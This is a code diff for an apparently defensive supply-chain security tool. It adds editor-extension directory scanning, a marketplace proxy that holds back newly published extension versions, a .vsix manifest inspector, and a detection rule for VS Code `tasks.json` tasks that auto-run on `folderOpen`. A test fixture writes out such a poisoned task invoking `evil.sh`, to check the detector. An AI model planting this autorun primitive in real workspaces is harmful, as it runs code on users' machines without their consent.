+/// intentionally `$HOME`-based and platform-aware; passing a
+/// pre-built `home` lets tests cover macOS / Linux / Windows shapes
+/// without touching the real `$HOME`.
+pub fn default_roots(home: &Path) -> Vec<EditorRoot> {
+    let candidates: &[(&str, &[&str])] = &[
+        // VS Code (official + Code-OSS / VSCodium share this path).
+        ("vscode-extensions", &[".vscode", "extensions"]),
+        // VS Code Insiders is a separate install root.
+        (
+            "vscode-insiders-extensions",
+            &[".vscode-insiders", "extensions"],
+        ),
+        // Cursor — fork of VS Code, identical layout.
+        ("cursor-extensions", &[".cursor", "extensions"]),
+        // Windsurf — Codeium's fork.
+        ("windsurf-extensions", &[".windsurf", "extensions"]),
+        // VS Code user-installed scripts / global storage — where
+        // a malicious extension would persist its payload across
+        // reinstalls. macOS / Linux / Windows layouts differ;
+        // [`platform_user_globalstorage`] resolves the right one.
+    ];
+    let mut out: Vec<EditorRoot> = candidates
+        .iter()
+        .map(|(label, segs)| {
+            let mut p = home.to_path_buf();
+            for s in *segs {
+                p.push(s);
+            }
+            EditorRoot {
+                label: (*label).to_string(),
+                path: p,
+            }
+        })
+        .collect();
+    if let Some(gs) = platform_user_globalstorage(home) {
+        out.push(EditorRoot {
+            label: "vscode-user-globalstorage".into(),
+            path: gs,
+        });
+    }
+    out.retain(|r| r.path.is_dir());
+    out
+}
+
+/// Locate the platform-appropriate `globalStorage` dir for VS Code.
+/// On Linux that's `$XDG_CONFIG_HOME/Code/User/globalStorage` (fall
+/// back to `~/.config/Code/User/globalStorage`); on macOS
+/// `~/Library/Application Support/Code/User/globalStorage`;
+/// on Windows `%APPDATA%\Code\User\globalStorage`. Returns `None`
+/// when the platform is unrecognised so a hypothetical BSD build
+/// just skips that root.
+fn platform_user_globalstorage(home: &Path) -> Option<PathBuf> {
+    #[cfg(target_os = "macos")]
+    {
+        let mut p = home.to_path_buf();
+        for s in [
+            "Library",
+            "Application Support",
+            "Code",
+            "User",
+            "globalStorage",
+        ] {
+            p.push(s);
+        }
+        Some(p)
+    }
+    #[cfg(target_os = "linux")]
+    {
+        let base = std::env::var_os("XDG_CONFIG_HOME")
+            .map(PathBuf::from)
+            .unwrap_or_else(|| home.join(".config"));
+        Some(base.join("Code").join("User").join("globalStorage"))
+    }
+    #[cfg(target_os = "windows")]
+    {
+        let _ = home;
+        std::env::var_os("APPDATA").map(|s| {
+            PathBuf::from(s)
+                .join("Code")
+                .join("User")
+                .join("globalStorage")
+        })
+    }
+    #[cfg(not(any(target_os = "linux", target_os = "macos", target_os = "windows")))]
+    {
+        let _ = home;
+        None
+    }
+}
+
+/// Walk every root in `roots` and merge the results into one
+/// [`Snapshot`]. Paths are prefixed by `<label>/<rel>` so two roots
+/// that happen to share a relative shape don't collide. The
+/// snapshot's `root` is set to a synthetic path (`<editor-extensions>`)
+/// since no single filesystem root covers the merged set; callers
+/// that diff against this snapshot only consume `files` and
+/// `unreadable`, both of which use the prefixed keys.
+pub fn snapshot_roots(roots: &[EditorRoot], opts: &Options) -> Result<Snapshot> {
+    let mut merged = Snapshot {
+        root: PathBuf::from("<editor-extensions>"),
+        files: BTreeMap::new(),
+        unreadable: Vec::new(),
+    };
+    for root in roots {
+        if !root.path.is_dir() {
+            // A root that exists in default_roots() but disappeared
+            // between discovery and the walk — treat as empty, no
+            // error. Defence shouldn't fail on legitimate non-state.
+            continue;
+        }
+        let one = Snapshot::take(&root.path, opts)?;
+        let prefix = PathBuf::from(&root.label);
+        for (rel, entry) in one.files {
+            merged.files.insert(prefix.join(&rel), entry);
+        }
+        for rel in one.unreadable {
+            merged.unreadable.push(prefix.join(&rel));
+        }
+    }
+    Ok(merged)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::fs;
+    use std::sync::atomic::{AtomicU64, Ordering};
+
+    static N: AtomicU64 = AtomicU64::new(0);
+
+    fn tmp_home(tag: &str) -> PathBuf {
+        let id = format!(
+            "{}-{}-{}",
+            std::process::id(),
+            N.fetch_add(1, Ordering::Relaxed),
+            std::time::SystemTime::now()
+                .duration_since(std::time::UNIX_EPOCH)
+                .map(|d| d.as_nanos())
+                .unwrap_or(0)
+        );
+        let p = std::env::temp_dir().join(format!("sakimori-edext-{tag}-{id}"));
+        fs::create_dir_all(&p).unwrap();
+        p
+    }
+
+    #[test]
+    fn default_roots_only_returns_existing_dirs() {
+        let home = tmp_home("default-roots-existing");
+        // Create only the vscode extensions dir; cursor / windsurf
+        // / insiders / globalStorage should be filtered out.
+        fs::create_dir_all(home.join(".vscode").join("extensions")).unwrap();
+        let roots = default_roots(&home);
+        let labels: Vec<&str> = roots.iter().map(|r| r.label.as_str()).collect();
+        assert!(
+            labels.contains(&"vscode-extensions"),
+            "want vscode-extensions in {labels:?}"
+        );
+        assert!(
+            !labels.contains(&"cursor-extensions"),
+            "cursor dir doesn't exist; must be filtered out: {labels:?}"
+        );
+        fs::remove_dir_all(home).ok();
+    }
+
+    #[test]
+    fn snapshot_roots_prefixes_each_files_relative_path_with_label() {
+        let home = tmp_home("snapshot-roots-prefix");
+        let vscode_ext = home.join(".vscode").join("extensions");
+        let cursor_ext = home.join(".cursor").join("extensions");
+        fs::create_dir_all(vscode_ext.join("a.b-1.0.0")).unwrap();
+        fs::create_dir_all(cursor_ext.join("a.b-1.0.0")).unwrap();
+        fs::write(vscode_ext.join("a.b-1.0.0").join("package.json"), b"{}").unwrap();
+        fs::write(cursor_ext.join("a.b-1.0.0").join("package.json"), b"{}").unwrap();
+
+        let roots = vec![
+            EditorRoot {
+                label: "vscode-extensions".into(),
+                path: vscode_ext.clone(),
+            },
+            EditorRoot {
+                label: "cursor-extensions".into(),
+                path: cursor_ext.clone(),
+            },
+        ];
+        let snap = snapshot_roots(&roots, &Options::default()).unwrap();
+        let keys: Vec<String> = snap
+            .files
+            .keys()
+            .map(|p| p.to_string_lossy().into_owned())
+            .collect();
+        // Both roots' identical relative paths must coexist under
+        // distinct prefixes — the whole point of the label.
+        assert!(
+            keys.iter()
+                .any(|k| k == "vscode-extensions/a.b-1.0.0/package.json"),
+            "got: {keys:?}"
+        );
+        assert!(
+            keys.iter()
+                .any(|k| k == "cursor-extensions/a.b-1.0.0/package.json"),
+            "got: {keys:?}"
+        );
+        fs::remove_dir_all(home).ok();
+    }
+
+    #[test]
+    fn snapshot_roots_skips_missing_root_without_erroring() {
+        // A root listed in `roots` but absent from disk should not
+        // be fatal — devs add / remove editors, and discovery may
+        // race with the walk. Defence shouldn't invent failures.
+        let home = tmp_home("snapshot-roots-missing");
+        let absent = home.join(".cursor").join("extensions");
+        let roots = vec![EditorRoot {
+            label: "cursor-extensions".into(),
+            path: absent,
+        }];
+        let snap = snapshot_roots(&roots, &Options::default()).unwrap();
+        assert!(snap.files.is_empty());
+        fs::remove_dir_all(home).ok();
+    }
+}

--- a/crates/sakimori-core/src/iocs.rs
+++ b/crates/sakimori-core/src/iocs.rs
@@ -31,7 +31,7 @@ use serde::Serialize;
 
 /// Version of the bundled catalog. Bump whenever the rule set changes
 /// so JSON consumers can tell which fingerprints were active.
-pub const CATALOG_VERSION: &str = "2026.05.20";
+pub const CATALOG_VERSION: &str = "2026.05.21";
 
 /// How many bytes of any single file the content scanner will read.
 /// 64 KiB easily covers `.npmrc`, `pyproject.toml`, lockfile metadata,
@@ -263,6 +263,31 @@ pub fn catalog() -> &'static [Rule] {
                           OAST/webhook capture service that has replaced \
                           `requestbin` in several recent supply-chain \
                           worm samples.",
+        },
+        Rule {
+            id: "vscode.tasks-folderopen-autorun",
+            family: "editor-extension",
+            severity: Severity::High,
+            kind: RuleKind::ContentNeedle {
+                // `runOn: "folderOpen"` is the VSCode primitive that
+                // executes a task the moment a workspace is opened —
+                // no command-palette interaction required. The string
+                // appears almost exclusively in this exact context;
+                // false positives in normal repos are vanishingly
+                // rare. Constrained to `tasks.json` (`launch.json`
+                // and `settings.json` don't accept the same key) to
+                // keep the surface tight.
+                needle: "\"runOn\": \"folderOpen\"",
+                basename_filter: Some("tasks.json"),
+            },
+            pattern: "\"runOn\": \"folderOpen\"",
+            description: "VSCode `.vscode/tasks.json` configured to \
+                          auto-run a task on `folderOpen`. Editor \
+                          opens the workspace → task runs with the \
+                          user's privileges, no prompt. The canonical \
+                          dropper primitive for workspace-poisoning \
+                          attacks; a clean repo essentially never \
+                          ships this.",
         },
         Rule {
             id: "exfil.pipedream-webhook",
@@ -798,6 +823,38 @@ mod tests {
                 .iter()
                 .any(|r| r.id == "exfil.pipedream-webhook"),
             "bare apex must not trip rule (FP mitigation)"
+        );
+    }
+
+    #[test]
+    fn vscode_tasks_folder_open_autorun_trips_rule_in_tasks_json() {
+        // The exact key the VSCode tasks.json schema documents for
+        // "run when the folder is opened" — the workspace-poison
+        // primitive a poisoned `.vscode/` ships.
+        let dirty =
+            br#"{ "version": "2.0.0", "tasks": [{ "label": "x", "command": "evil.sh", "runOptions": { "runOn": "folderOpen" } }] }"#;
+        let hits = matches_content("tasks.json", dirty);
+        assert!(
+            hits.iter()
+                .any(|r| r.id == "vscode.tasks-folderopen-autorun"),
+            "got: {:?}",
+            hits.iter().map(|r| r.id).collect::<Vec<_>>()
+        );
+    }
+
+    #[test]
+    fn vscode_tasks_rule_is_basename_scoped_to_tasks_json() {
+        // Same string in a file that isn't `tasks.json` should not
+        // trip — keeps the surface tight against accidental mentions
+        // in unrelated docs / configs.
+        let dirty = br#"someConfig = "\"runOn\": \"folderOpen\"""#;
+        let hits = matches_content("README.md", dirty);
+        assert!(
+            !hits
+                .iter()
+                .any(|r| r.id == "vscode.tasks-folderopen-autorun"),
+            "rule must be basename-scoped: {:?}",
+            hits.iter().map(|r| r.id).collect::<Vec<_>>()
         );
     }
 

--- a/crates/sakimori-core/src/lib.rs
+++ b/crates/sakimori-core/src/lib.rs
@@ -17,6 +17,7 @@ pub mod attribution;
 pub mod cloud_secrets;
 pub mod codeowners;
 pub mod deps;
+pub mod editor_extensions;
 pub mod events;
 pub mod html;
 pub mod installs;

--- a/crates/sakimori-proxy/Cargo.toml
+++ b/crates/sakimori-proxy/Cargo.toml
@@ -42,6 +42,12 @@ sha1 = "0.10"
 sha2 = "0.10"
 tar = "0.4"
 flate2 = "1"
+# .vsix lifecycle inspection — VSIX files are zip-packaged with an
+# `extension/package.json` root manifest. `zip` is the standard
+# Rust crate for the format. `default-features = false` drops the
+# bzip2 / lzma / zstd / aes features we don't need; the deflate
+# default is enabled via the `_deflate-flate2` feature.
+zip = { version = "2", default-features = false, features = ["deflate"] }
 toml = { workspace = true }
 
 # Custom upstream TLS client for `extra_upstream_roots`. Versions

--- a/crates/sakimori-proxy/src/lib.rs
+++ b/crates/sakimori-proxy/src/lib.rs
@@ -19,6 +19,7 @@ pub mod rewrite;
 pub mod rewrite_npm;
 pub mod rewrite_nuget;
 pub mod rewrite_pypi;
+pub mod rewrite_vscode;
 pub mod sigstore_verify;
 pub mod strip_cache;
 pub mod typosquat;
@@ -40,3 +41,4 @@ pub use rewrite_pypi::{
     PypiRewriteStats, extract_publish_times_from_pypi_json, rewrite_pypi_json_api,
     rewrite_pypi_simple_html, rewrite_pypi_simple_json,
 };
+pub use rewrite_vscode::{VscodeRewriteStats, rewrite_extensionquery_json};

--- a/crates/sakimori-proxy/src/lib.rs
+++ b/crates/sakimori-proxy/src/lib.rs
@@ -23,6 +23,7 @@ pub mod rewrite_vscode;
 pub mod sigstore_verify;
 pub mod strip_cache;
 pub mod typosquat;
+pub mod vsix_inspect;
 
 pub use decision::{AgeOracle, Decider, Decision, RegistryOracle};
 pub use parser::{

--- a/crates/sakimori-proxy/src/parser.rs
+++ b/crates/sakimori-proxy/src/parser.rs
@@ -741,6 +741,7 @@ mod tests {
             crates: vec![],
             crates_sparse: vec![],
             nuget: vec![],
+            vscode_marketplace: vec![],
         };
         let ps = parsers_from_hosts(&h);
         for host in [

--- a/crates/sakimori-proxy/src/parser.rs
+++ b/crates/sakimori-proxy/src/parser.rs
@@ -359,6 +359,34 @@ impl RegistryParser for NugetParser {
     }
 }
 
+/// Parser for the VS Code Marketplace / OpenVSX gallery hosts.
+///
+/// The marketplace's only response-rewrite surface today is the
+/// `extensionquery` JSON endpoint — there are no pinned `.vsix`
+/// downloads to age-check until the lifecycle gate (#21) ships.
+/// So this parser exists purely to teach `should_intercept` /
+/// `parse_for_host` about marketplace hostnames; it returns
+/// `Metadata` for every path, which is the "intercept but don't
+/// hard-deny anything" signal the rewrite layer keys off.
+pub struct VscodeMarketplaceParser {
+    hosts: Vec<String>,
+}
+
+impl VscodeMarketplaceParser {
+    pub fn new(hosts: Vec<String>) -> Self {
+        Self { hosts }
+    }
+}
+
+impl RegistryParser for VscodeMarketplaceParser {
+    fn hosts(&self) -> &[String] {
+        &self.hosts
+    }
+    fn parse(&self, _path: &str) -> ParseResult {
+        ParseResult::Metadata
+    }
+}
+
 /// Build the canonical default parser set (single canonical public
 /// host per ecosystem). Kept for callers that don't need custom
 /// registries — equivalent to `parsers_from_hosts(&RegistryHosts::default())`.
@@ -378,6 +406,7 @@ pub fn parsers_from_hosts(h: &RegistryHosts) -> Vec<Box<dyn RegistryParser>> {
         Box::new(PypiParser::new(h.pypi_files.clone())),
         Box::new(PypiOrgParser::new(h.pypi_index.clone())),
         Box::new(NugetParser::new(h.nuget.clone())),
+        Box::new(VscodeMarketplaceParser::new(h.vscode_marketplace.clone())),
     ]
 }
 

--- a/crates/sakimori-proxy/src/proxy.rs
+++ b/crates/sakimori-proxy/src/proxy.rs
@@ -1216,6 +1216,22 @@ impl HttpHandler for SakimoriHandler {
                 }
                 out
             }
+            RewriteTarget::VscodeExtensionQuery => {
+                let (out, stats) = crate::rewrite_vscode::rewrite_extensionquery_json(
+                    &collected,
+                    self.decider.min_age,
+                    now,
+                );
+                if stats.dropped > 0 {
+                    log::info!(
+                        "vscode-rewrite: dropped {} version(s), kept {}, emptied {} extension(s)",
+                        stats.dropped,
+                        stats.kept,
+                        stats.emptied_extensions,
+                    );
+                }
+                out
+            }
             RewriteTarget::NugetFlatContainerIndex(id) => {
                 // Look up publish times from the registration endpoint.
                 // Cached per package; a failed lookup yields an empty
@@ -1608,6 +1624,12 @@ enum RewriteTarget {
     /// handler can feed it to the out-of-band registration fetcher
     /// without re-parsing the path.
     NugetFlatContainerIndex(String),
+    /// VS Code Marketplace / OpenVSX `extensionquery` POST response.
+    /// JSON envelope with `results[].extensions[].versions[]` — the
+    /// rewriter filters each `versions[]` by `lastUpdated` against
+    /// `--min-age` so the editor's installer naturally falls back to
+    /// the newest surviving version (pnpm-style silent fallback).
+    VscodeExtensionQuery,
 }
 
 /// Match the in-flight `(host, path)` to a rewriter. Returning `None`
@@ -1651,7 +1673,22 @@ fn classify_response(
             return Some(RewriteTarget::NugetFlatContainerIndex(id));
         }
     }
+    if host_in(&registries.vscode_marketplace, host) && is_extensionquery_path(path) {
+        return Some(RewriteTarget::VscodeExtensionQuery);
+    }
     None
+}
+
+/// Recognise the VS Code Marketplace / OpenVSX `extensionquery`
+/// endpoint. Microsoft's gallery serves it at
+/// `/_apis/public/gallery/extensionquery`; OpenVSX exposes a
+/// compatibility shim at `/vscode/gallery/extensionquery`. Both
+/// return the same JSON envelope.
+fn is_extensionquery_path(path: &str) -> bool {
+    let path = path.split('?').next().unwrap_or(path);
+    let path = path.trim_end_matches('/');
+    path.eq_ignore_ascii_case("/_apis/public/gallery/extensionquery")
+        || path.eq_ignore_ascii_case("/vscode/gallery/extensionquery")
 }
 
 fn host_in(set: &[String], host: &str) -> bool {
@@ -1987,6 +2024,34 @@ mod tests {
             classify_response(
                 Some("api.nuget.org"),
                 Some("/v3-flatcontainer/newtonsoft.json/13.0.1/newtonsoft.json.13.0.1.nupkg"),
+                &r,
+            ),
+            None
+        );
+        // VS Code Marketplace + OpenVSX extensionquery — both
+        // canonical hosts share the same RewriteTarget; Microsoft's
+        // path and OpenVSX's compat-shim path both match.
+        assert_eq!(
+            classify_response(
+                Some("marketplace.visualstudio.com"),
+                Some("/_apis/public/gallery/extensionquery"),
+                &r,
+            ),
+            Some(RewriteTarget::VscodeExtensionQuery)
+        );
+        assert_eq!(
+            classify_response(
+                Some("open-vsx.org"),
+                Some("/vscode/gallery/extensionquery"),
+                &r,
+            ),
+            Some(RewriteTarget::VscodeExtensionQuery)
+        );
+        // Unknown path on a marketplace host falls through.
+        assert_eq!(
+            classify_response(
+                Some("marketplace.visualstudio.com"),
+                Some("/api/something/else"),
                 &r,
             ),
             None

--- a/crates/sakimori-proxy/src/registries.rs
+++ b/crates/sakimori-proxy/src/registries.rs
@@ -40,6 +40,11 @@ pub struct RegistryHosts {
     /// NuGet v3 host(s) (registration + flat-container endpoints).
     /// Default: `api.nuget.org`.
     pub nuget: Vec<String>,
+    /// VS Code Marketplace / OpenVSX host(s) — the gallery API
+    /// serving `extensionquery` JSON. Default:
+    /// `marketplace.visualstudio.com`, `open-vsx.org`. Both speak the
+    /// same response envelope so the rewriter handles them uniformly.
+    pub vscode_marketplace: Vec<String>,
 }
 
 impl Default for RegistryHosts {
@@ -51,6 +56,7 @@ impl Default for RegistryHosts {
             crates: vec!["crates.io".into()],
             crates_sparse: vec!["index.crates.io".into()],
             nuget: vec!["api.nuget.org".into()],
+            vscode_marketplace: vec!["marketplace.visualstudio.com".into(), "open-vsx.org".into()],
         }
     }
 }
@@ -98,6 +104,7 @@ impl RegistryHosts {
         extend(&mut self.crates, &other.crates);
         extend(&mut self.crates_sparse, &other.crates_sparse);
         extend(&mut self.nuget, &other.nuget);
+        extend(&mut self.vscode_marketplace, &other.vscode_marketplace);
     }
 
     /// Convenience: start from `Default::default()`, then layer in

--- a/crates/sakimori-proxy/src/rewrite_vscode.rs
+++ b/crates/sakimori-proxy/src/rewrite_vscode.rs
@@ -1,0 +1,238 @@
+//! VS Code Marketplace / OpenVSX extension-query rewriter — the
+//! editor-extension counterpart to [`crate::rewrite_npm`] +
+//! [`crate::rewrite_pypi`].
+//!
+//! Both `marketplace.visualstudio.com` (Microsoft's gallery) and
+//! `open-vsx.org` (the Eclipse-foundation mirror Cursor / VSCodium
+//! query) expose a `POST .../gallery/extensionquery` endpoint that
+//! returns a JSON document shaped like:
+//!
+//! ```json
+//! {
+//!   "results": [{
+//!     "extensions": [{
+//!       "publisher": { "publisherName": "ms-vscode", … },
+//!       "extensionName": "vscode-eslint",
+//!       "versions": [
+//!         { "version": "3.0.10",
+//!           "lastUpdated": "2024-05-14T12:00:00.000Z",
+//!           "assetUri": "…", "files": [ … ] },
+//!         { "version": "3.0.9",  "lastUpdated": "2024-04-12T…", … }
+//!       ],
+//!       …
+//!     }]
+//!   }]
+//! }
+//! ```
+//!
+//! Strategy mirrors the npm packument rewriter: drop entries from
+//! every `versions[]` array whose `lastUpdated` is younger than
+//! `min_age`. The VS Code client then picks the newest surviving
+//! version naturally — same silent-fallback model pnpm uses for
+//! `minimumReleaseAge`. If every version of an extension is filtered
+//! out we leave the `extensions` entry in place with an empty
+//! `versions: []`; the client's installer treats that as "no
+//! installable version" and surfaces a clean error rather than the
+//! whole query silently dropping the extension (which can mask
+//! legitimate missing-on-mirror cases).
+//!
+//! Pure + synchronous; unit tests cover every branch without a real
+//! HTTP server. The marketplace JSON does not preserve key insertion
+//! order across all upstreams, but `serde_json` is built workspace-
+//! wide with `preserve_order` so re-serialising leaves untouched
+//! fields byte-stable.
+
+use std::time::Duration;
+
+use chrono::{DateTime, Utc};
+use serde_json::Value;
+
+#[derive(Debug, Clone, PartialEq, Eq, Default)]
+pub struct VscodeRewriteStats {
+    pub kept: usize,
+    pub dropped: usize,
+    /// Extensions whose entire `versions[]` was dropped. Useful for
+    /// logging "no installable version" cases distinct from "partial
+    /// trim".
+    pub emptied_extensions: usize,
+}
+
+/// Rewrite a VS Code Marketplace / OpenVSX `extensionquery` JSON
+/// body. Drops `versions[]` entries whose `lastUpdated` is younger
+/// than `min_age`. Bytes that don't parse as JSON, or don't have the
+/// expected envelope, are returned unchanged — defence shouldn't
+/// invent rejections for non-standard responses.
+pub fn rewrite_extensionquery_json(
+    body: &[u8],
+    min_age: Duration,
+    now: DateTime<Utc>,
+) -> (Vec<u8>, VscodeRewriteStats) {
+    let mut stats = VscodeRewriteStats::default();
+    let mut doc: Value = match serde_json::from_slice(body) {
+        Ok(v) => v,
+        Err(e) => {
+            log::debug!("vscode-rewrite: pass-through, parse failed: {e}");
+            return (body.to_vec(), stats);
+        }
+    };
+    let cutoff = chrono::Duration::from_std(min_age).unwrap_or_default();
+
+    let Some(results) = doc.get_mut("results").and_then(Value::as_array_mut) else {
+        return (body.to_vec(), stats);
+    };
+    for result in results.iter_mut() {
+        let Some(exts) = result.get_mut("extensions").and_then(Value::as_array_mut) else {
+            continue;
+        };
+        for ext in exts.iter_mut() {
+            let Some(versions) = ext.get_mut("versions").and_then(Value::as_array_mut) else {
+                continue;
+            };
+            let before = versions.len();
+            versions.retain(|v| {
+                let Some(updated) = v.get("lastUpdated").and_then(Value::as_str) else {
+                    // Missing timestamp — keep, fail-open. The
+                    // tarball-pin path (#21 lifecycle gate) is the
+                    // backstop for "we couldn't decide here".
+                    return true;
+                };
+                let Ok(dt) = DateTime::parse_from_rfc3339(updated) else {
+                    return true;
+                };
+                (now - dt.with_timezone(&Utc)) >= cutoff
+            });
+            let after = versions.len();
+            stats.dropped += before - after;
+            stats.kept += after;
+            if before > 0 && after == 0 {
+                stats.emptied_extensions += 1;
+            }
+        }
+    }
+
+    let out = serde_json::to_vec(&doc).unwrap_or_else(|_| body.to_vec());
+    (out, stats)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use chrono::TimeZone;
+
+    fn body_with(versions_json: &str) -> Vec<u8> {
+        format!(
+            r#"{{"results":[{{"extensions":[{{"publisher":{{"publisherName":"ms-vscode"}},"extensionName":"vscode-eslint","versions":{versions_json}}}]}}]}}"#,
+        )
+        .into_bytes()
+    }
+
+    #[test]
+    fn drops_versions_younger_than_min_age() {
+        // now = 2024-05-20; min_age = 7 days; cutoff = 2024-05-13.
+        // 3.0.10 (2024-05-19) — too young, drop.
+        // 3.0.9  (2024-04-12) — old enough, keep.
+        let now = Utc.with_ymd_and_hms(2024, 5, 20, 0, 0, 0).unwrap();
+        let body = body_with(
+            r#"[
+              {"version":"3.0.10","lastUpdated":"2024-05-19T12:00:00.000Z"},
+              {"version":"3.0.9","lastUpdated":"2024-04-12T12:00:00.000Z"}
+            ]"#,
+        );
+        let (out, stats) = rewrite_extensionquery_json(&body, Duration::from_secs(7 * 86400), now);
+        assert_eq!(stats.dropped, 1);
+        assert_eq!(stats.kept, 1);
+        assert_eq!(stats.emptied_extensions, 0);
+        let v: Value = serde_json::from_slice(&out).unwrap();
+        let versions = v["results"][0]["extensions"][0]["versions"]
+            .as_array()
+            .unwrap();
+        assert_eq!(versions.len(), 1);
+        assert_eq!(versions[0]["version"], "3.0.9");
+    }
+
+    #[test]
+    fn empties_versions_array_when_every_version_is_too_young() {
+        let now = Utc.with_ymd_and_hms(2024, 5, 20, 0, 0, 0).unwrap();
+        let body = body_with(
+            r#"[
+              {"version":"3.0.10","lastUpdated":"2024-05-19T12:00:00.000Z"},
+              {"version":"3.0.11","lastUpdated":"2024-05-18T12:00:00.000Z"}
+            ]"#,
+        );
+        let (out, stats) = rewrite_extensionquery_json(&body, Duration::from_secs(7 * 86400), now);
+        assert_eq!(stats.dropped, 2);
+        assert_eq!(stats.kept, 0);
+        assert_eq!(stats.emptied_extensions, 1);
+        let v: Value = serde_json::from_slice(&out).unwrap();
+        // Extension entry survives so the client can produce a
+        // "no installable version" error rather than silently
+        // dropping the extension.
+        assert!(
+            v["results"][0]["extensions"][0]["versions"]
+                .as_array()
+                .unwrap()
+                .is_empty()
+        );
+        assert_eq!(
+            v["results"][0]["extensions"][0]["extensionName"],
+            "vscode-eslint"
+        );
+    }
+
+    #[test]
+    fn keeps_entries_with_unparseable_or_missing_timestamps_fail_open() {
+        let now = Utc.with_ymd_and_hms(2024, 5, 20, 0, 0, 0).unwrap();
+        let body = body_with(
+            r#"[
+              {"version":"3.0.10"},
+              {"version":"3.0.9","lastUpdated":"not-a-date"},
+              {"version":"3.0.8","lastUpdated":"2024-04-12T12:00:00.000Z"}
+            ]"#,
+        );
+        let (_, stats) = rewrite_extensionquery_json(&body, Duration::from_secs(7 * 86400), now);
+        assert_eq!(stats.dropped, 0);
+        assert_eq!(stats.kept, 3);
+    }
+
+    #[test]
+    fn non_envelope_json_is_passed_through_byte_for_byte() {
+        let now = Utc.with_ymd_and_hms(2024, 5, 20, 0, 0, 0).unwrap();
+        let body = br#"{"unexpected":"shape"}"#;
+        let (out, stats) = rewrite_extensionquery_json(body, Duration::from_secs(7 * 86400), now);
+        assert_eq!(out, body);
+        assert_eq!(stats, VscodeRewriteStats::default());
+    }
+
+    #[test]
+    fn garbage_input_is_passed_through_byte_for_byte() {
+        let now = Utc.with_ymd_and_hms(2024, 5, 20, 0, 0, 0).unwrap();
+        let body = b"<html>not json</html>";
+        let (out, stats) = rewrite_extensionquery_json(body, Duration::from_secs(7 * 86400), now);
+        assert_eq!(out, body);
+        assert_eq!(stats, VscodeRewriteStats::default());
+    }
+
+    #[test]
+    fn multiple_extensions_are_filtered_independently() {
+        let now = Utc.with_ymd_and_hms(2024, 5, 20, 0, 0, 0).unwrap();
+        let body = r#"{"results":[{"extensions":[
+              {"publisher":{"publisherName":"a"},"extensionName":"ext-a","versions":[
+                {"version":"1.0","lastUpdated":"2024-05-19T12:00:00.000Z"},
+                {"version":"0.9","lastUpdated":"2024-04-12T12:00:00.000Z"}
+              ]},
+              {"publisher":{"publisherName":"b"},"extensionName":"ext-b","versions":[
+                {"version":"2.0","lastUpdated":"2024-04-01T12:00:00.000Z"}
+              ]}
+            ]}]}"#
+            .as_bytes()
+            .to_vec();
+        let (out, stats) = rewrite_extensionquery_json(&body, Duration::from_secs(7 * 86400), now);
+        assert_eq!(stats.dropped, 1);
+        assert_eq!(stats.kept, 2);
+        let v: Value = serde_json::from_slice(&out).unwrap();
+        let exts = v["results"][0]["extensions"].as_array().unwrap();
+        assert_eq!(exts[0]["versions"].as_array().unwrap().len(), 1);
+        assert_eq!(exts[0]["versions"][0]["version"], "0.9");
+        assert_eq!(exts[1]["versions"].as_array().unwrap().len(), 1);
+    }
+}

--- a/crates/sakimori-proxy/src/vsix_inspect.rs
+++ b/crates/sakimori-proxy/src/vsix_inspect.rs
@@ -1,0 +1,333 @@
+//! `.vsix` (VS Code Extension package) inspector — the editor-
+//! extension counterpart to [`crate::lifecycle::inspect_npm_tarball`].
+//!
+//! A `.vsix` is a zip archive (OPC-flavoured) containing an
+//! `extension/` root with a `package.json` manifest. The fields we
+//! care about for supply-chain audit are:
+//!
+//! - `activationEvents`: the VS Code primitive controlling when an
+//!   extension's code runs. `["*"]` means "activate immediately on
+//!   editor startup" — the highest-blast-radius value, and the one
+//!   recent supply-chain droppers favour because it removes the
+//!   need to convince a victim to invoke any specific command.
+//!   `onStartupFinished` is a softer version of the same thing.
+//! - `main`: the entry point JS the extension host runs.
+//!   References to `child_process` / `node:vm` / `eval` inside that
+//!   JS are obvious red flags, but the entry point first surfaces
+//!   here.
+//!
+//! This module is **pure** — input bytes → result struct, no IO
+//! beyond zip decoding. The proxy will call it on `.vsix` download
+//! responses; CLI auditors can call it on locally cached `.vsix`
+//! files to vet sideloads.
+//!
+//! Out of scope (for the first slice, per CLAUDE.md roadmap #21):
+//!
+//! - **`strip` mode** (rewrite `activationEvents: ["*"]` to `[]`
+//!   and re-emit the zip). Substantially larger because we'd have
+//!   to recompute the Marketplace integrity hash the editor then
+//!   verifies. Audit / block are the load-bearing first slice.
+//! - **`.crx`** (Chrome extensions). Chrome packages are signed
+//!   end-to-end so strip is impossible by design; we'll wire `.crx`
+//!   audit later.
+//! - **`main` JS body scanning**. Catching `eval` / `child_process`
+//!   in the bundled JS is valuable but is a larger surface (often
+//!   minified / obfuscated) and lives more naturally in the
+//!   `iocs::ContentNeedle` catalog than here.
+
+use std::io::{Cursor, Read};
+
+use serde::Deserialize;
+
+/// Hard ceilings on the per-vsix walk so a malicious archive can't
+/// stall the proxy. Both values are deliberately generous compared
+/// to legitimate extensions (the biggest Marketplace extensions
+/// are ~50 MiB compressed; `package.json` is at most a few KiB)
+/// so they only fire on attack inputs.
+pub const MAX_VSIX_BYTES: usize = 100 * 1024 * 1024;
+pub const MAX_PACKAGE_JSON_BYTES: usize = 1024 * 1024;
+
+/// What the inspector found in a `.vsix`.
+#[derive(Debug, Clone, Default, PartialEq, Eq)]
+pub struct VsixInspection {
+    /// `name` from `extension/package.json`. Empty when the manifest
+    /// is missing or malformed.
+    pub name: String,
+    /// `publisher` from `extension/package.json`.
+    pub publisher: String,
+    /// `version` from `extension/package.json`.
+    pub version: String,
+    /// Raw `activationEvents` array from the manifest.
+    pub activation_events: Vec<String>,
+    /// `main` field — the JS entry the extension host loads.
+    pub main: Option<String>,
+    /// True when `activationEvents` contains the wildcard `"*"`
+    /// or `onStartupFinished` — both fire without any user
+    /// interaction. The block-mode decision keys off this.
+    pub fires_on_startup: bool,
+}
+
+impl VsixInspection {
+    /// Cheap accessor used by the block decision.
+    pub fn has_startup_autorun(&self) -> bool {
+        self.fires_on_startup
+    }
+}
+
+#[derive(Debug)]
+pub enum VsixInspectError {
+    /// Body exceeded [`MAX_VSIX_BYTES`] — we refuse to walk it.
+    TooLarge { size: usize },
+    /// Bytes don't open as a zip archive.
+    NotZip(String),
+    /// `extension/package.json` exists but is past
+    /// [`MAX_PACKAGE_JSON_BYTES`]; an honest extension manifest is
+    /// at most a few KiB.
+    ManifestTooLarge { size: u64 },
+    /// IO error while reading the manifest entry.
+    ManifestRead(String),
+}
+
+impl std::fmt::Display for VsixInspectError {
